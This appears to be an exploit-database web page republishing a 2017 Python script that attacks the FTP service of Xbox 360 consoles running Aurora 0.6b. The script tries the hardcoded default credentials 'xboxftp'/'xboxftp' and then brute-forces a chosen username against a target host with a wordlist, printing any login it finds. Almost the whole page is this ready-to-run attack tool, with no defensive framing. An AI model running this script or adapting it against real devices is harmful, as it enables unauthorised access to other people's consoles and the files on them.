XBOX 360 Aurora 0.6b Default Credentials FTP Bruteforcer

Details
Category: Vulnerabilities
Hits: 533
# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Tested on: XBOX 360
# GREETZ: Iker Legorreta, #RemoteExecution Team



#!/usr/bin/env python
# -*- coding:utf-8 -*-

__author__ = 'Daniel Godoy'

import argparse
import sys
from ftplib import FTP

info = '''
XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
Usage: ./xbox_ftp_brute_forcer.py [options]
Options: -t, --target <hostname/ip> | Target
-u, --user <user> | User
-w, --wordlist <filename> | Wordlist
-h, --help <help> | print help

Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w
/root/Desktop/wordlist.txt
'''


def help():
print info
sys.exit(0)


def check_default_login(target):
try:
ftp = FTP(target)
ftp.login('xboxftp', 'xboxftp')
ftp.quit()
print " [+] Default login is open."
print " [+] Username : xboxftp"
print " [+] Password : xboxftp "
ftp.quit()
except:
pass


def ftp_login(target, username, password):
try:
ftp = FTP(target)
ftp.login(username, password)
ftp.quit()
print " [*] Credentials have found."
print " [*] Username : {}".format(username)
print " [*] Password : {}".format(password)
return True
except:
return False


def brute_force(target, username, wordlist):
try:
wordlist = open(wordlist, "r")
words = wordlist.readlines()
for word in words:
word = word.strip()
if ftp_login(target, username, word):
break
except:
print " [-] There is no such wordlist file. "
sys.exit(0)



parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target")
parser.add_argument("-u", "--username")
parser.add_argument("-w", "--wordlist")

args = parser.parse_args()

if not args.target or not args.username or not args.wordlist:
help()
sys.exit(0)

target = args.target
username = args.username
wordlist = args.wordlist

brute_force(target, username, wordlist)
check_default_login(target)
print " [-] Brute force finished. "